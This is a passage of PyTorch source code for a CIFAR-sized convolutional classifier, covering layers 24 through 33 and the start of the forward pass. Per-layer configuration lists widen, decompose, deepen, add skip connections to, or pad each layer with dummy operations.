if self.skipcon_list != None:
if self.skipcon_list[24] == 1:
self.conv24_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn24 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[24] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[24] / 4) * 4)
if self.widen_list[25] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[25] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[25] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[25])
params[3] = params[3] + 2* int(self.kerneladd_list[25])
params[6] = params[6] + int(self.kerneladd_list[25])
params[7] = params[7] + int(self.kerneladd_list[25])
if self.decompo_list != None:
if self.decompo_list[25] == 1:
self.conv25_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[25] == 2:
self.conv25_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[25] == 3:
self.conv25_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[25] == 4:
self.conv25_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv25_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv25 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv25 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[25] == 1:
self.conv25_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[25] == 1:
self.conv25_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn25 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[25] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[25] / 4) * 4)
if self.widen_list[26] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[26] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[26] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[26])
params[3] = params[3] + 2* int(self.kerneladd_list[26])
params[6] = params[6] + int(self.kerneladd_list[26])
params[7] = params[7] + int(self.kerneladd_list[26])
if self.decompo_list != None:
if self.decompo_list[26] == 1:
self.conv26_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[26] == 2:
self.conv26_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[26] == 3:
self.conv26_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[26] == 4:
self.conv26_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv26_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv26 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv26 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[26] == 1:
self.conv26_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[26] == 1:
self.conv26_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn26 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[26] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[26] / 4) * 4)
if self.widen_list[27] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[27] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[27] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[27])
params[3] = params[3] + 2* int(self.kerneladd_list[27])
params[6] = params[6] + int(self.kerneladd_list[27])
params[7] = params[7] + int(self.kerneladd_list[27])
if self.decompo_list != None:
if self.decompo_list[27] == 1:
self.conv27_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[27] == 2:
self.conv27_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[27] == 3:
self.conv27_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[27] == 4:
self.conv27_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv27_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv27 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv27 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[27] == 1:
self.conv27_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[27] == 1:
self.conv27_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn27 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[27] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[27] / 4) * 4)
if self.widen_list[28] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[28] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[28] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[28])
params[3] = params[3] + 2* int(self.kerneladd_list[28])
params[6] = params[6] + int(self.kerneladd_list[28])
params[7] = params[7] + int(self.kerneladd_list[28])
if self.decompo_list != None:
if self.decompo_list[28] == 1:
self.conv28_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[28] == 2:
self.conv28_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[28] == 3:
self.conv28_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[28] == 4:
self.conv28_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv28 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv28 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[28] == 1:
self.conv28_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[28] == 1:
self.conv28_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn28 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[28] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[28] / 4) * 4)
if self.widen_list[29] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[29] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[29] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[29])
params[3] = params[3] + 2* int(self.kerneladd_list[29])
params[6] = params[6] + int(self.kerneladd_list[29])
params[7] = params[7] + int(self.kerneladd_list[29])
if self.decompo_list != None:
if self.decompo_list[29] == 1:
self.conv29_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[29] == 2:
self.conv29_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[29] == 3:
self.conv29_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[29] == 4:
self.conv29_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv29 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv29 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[29] == 1:
self.conv29_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[29] == 1:
self.conv29_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn29 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[29] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[29] / 4) * 4)
if self.widen_list[30] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[30] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[30] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[30])
params[3] = params[3] + 2* int(self.kerneladd_list[30])
params[6] = params[6] + int(self.kerneladd_list[30])
params[7] = params[7] + int(self.kerneladd_list[30])
if self.decompo_list != None:
if self.decompo_list[30] == 1:
self.conv30_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[30] == 2:
self.conv30_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[30] == 3:
self.conv30_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[30] == 4:
self.conv30_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv30 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv30 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[30] == 1:
self.conv30_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[30] == 1:
self.conv30_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn30 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[30] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[30] / 4) * 4)
if self.widen_list[31] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[31] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[31] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[31])
params[3] = params[3] + 2* int(self.kerneladd_list[31])
params[6] = params[6] + int(self.kerneladd_list[31])
params[7] = params[7] + int(self.kerneladd_list[31])
if self.decompo_list != None:
if self.decompo_list[31] == 1:
self.conv31_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[31] == 2:
self.conv31_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[31] == 3:
self.conv31_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[31] == 4:
self.conv31_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv31 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv31 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[31] == 1:
self.conv31_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[31] == 1:
self.conv31_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn31 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[31] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[31] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[32] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[32])
params[3] = params[3] + 2* int(self.kerneladd_list[32])
params[6] = params[6] + int(self.kerneladd_list[32])
params[7] = params[7] + int(self.kerneladd_list[32])
if self.decompo_list != None:
if self.decompo_list[32] == 1:
self.conv32_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[32] == 2:
self.conv32_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[32] == 3:
self.conv32_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[32] == 4:
self.conv32_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv32 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv32 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[32] == 1:
self.conv32_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[32] == 1:
self.conv32_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn32 = torch.nn.BatchNorm2d(params[1])
params = [64, 10]
if self.widen_list != None:
pass
if self.decompo_list != None:
if self.decompo_list[33] == 1:
self.classifier_0 = torch.nn.Linear(params[0], int(params[1]/2))
self.classifier_1 = torch.nn.Linear(params[0], int(params[1]/2))
elif self.decompo_list[33] == 3:
self.classifier_0 = torch.nn.Linear(int(params[0]/2), params[1])
self.classifier_1 = torch.nn.Linear(int(params[0]/2), params[1])
elif self.decompo_list[33] == 4:
self.classifier_0 = torch.nn.Linear(int(params[0]/4), params[1])
self.classifier_1 = torch.nn.Linear(int(params[0]/4), params[1])
self.classifier_2 = torch.nn.Linear(int(params[0]/4), params[1])
self.classifier_3 = torch.nn.Linear(int(params[0]/4), params[1])
else:
self.classifier = torch.nn.Linear(params[0], params[1])
else:
self.classifier = torch.nn.Linear(params[0], params[1])
if self.deepen_list != None:
if self.deepen_list[33] == 1:
self.classifier_dp = torch.nn.Linear(params[1], params[1])
if self.skipcon_list != None:
if self.skipcon_list[33] == 1:
self.classifier_sk = torch.nn.Linear(params[1], params[1])
self.reset_parameters(input_features)
def reset_parameters(self, input_features):
stdv = 1.0 / math.sqrt(input_features)
for weight in self.parameters():
weight.data.uniform_(-stdv, +stdv)
def forward(self, X1):
if self.reshape:
X1 = X1.reshape(-1, 3, 32, 32)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[0] == 1:
X1_0 = self.conv0_0(X1)
X1_1 = self.conv0_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[0] == 2:
X1_0 = self.conv0_0(X1)
X1_1 = self.conv0_1(X1)
X1_2 = self.conv0_2(X1)
X1_3 = self.conv0_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
else:
X1 = self.conv0(X1)
else:
X1 = self.conv0(X1)
if self.dummy_list != None:
if self.dummy_list[0] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[0]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn0(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[0] == 1:
X1 = self.conv0_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[0] == 1:
X1_skip = X1
X1 = self.conv0_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[1] == 1:
X1_0 = self.conv1_0(X1)
X1_1 = self.conv1_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[1] == 2:
X1_0 = self.conv1_0(X1)
X1_1 = self.conv1_1(X1)
X1_2 = self.conv1_2(X1)
X1_3 = self.conv1_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[1] == 3:
X1_0 = self.conv1_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv1_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[1] == 4:
X1_0 = self.conv1_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv1_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv1_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv1_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv1(X1)
else:
X1 = self.conv1(X1)
if self.dummy_list != None:
if self.dummy_list[1] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[1]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn1(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[1] == 1:
X1 = self.conv1_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[1] == 1:
X1_skip = X1
X1 = self.conv1_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[2] == 1:
X1_0 = self.conv2_0(X1)
X1_1 = self.conv2_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[2] == 2:
X1_0 = self.conv2_0(X1)
X1_1 = self.conv2_1(X1)
X1_2 = self.conv2_2(X1)
X1_3 = self.conv2_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[2] == 3:
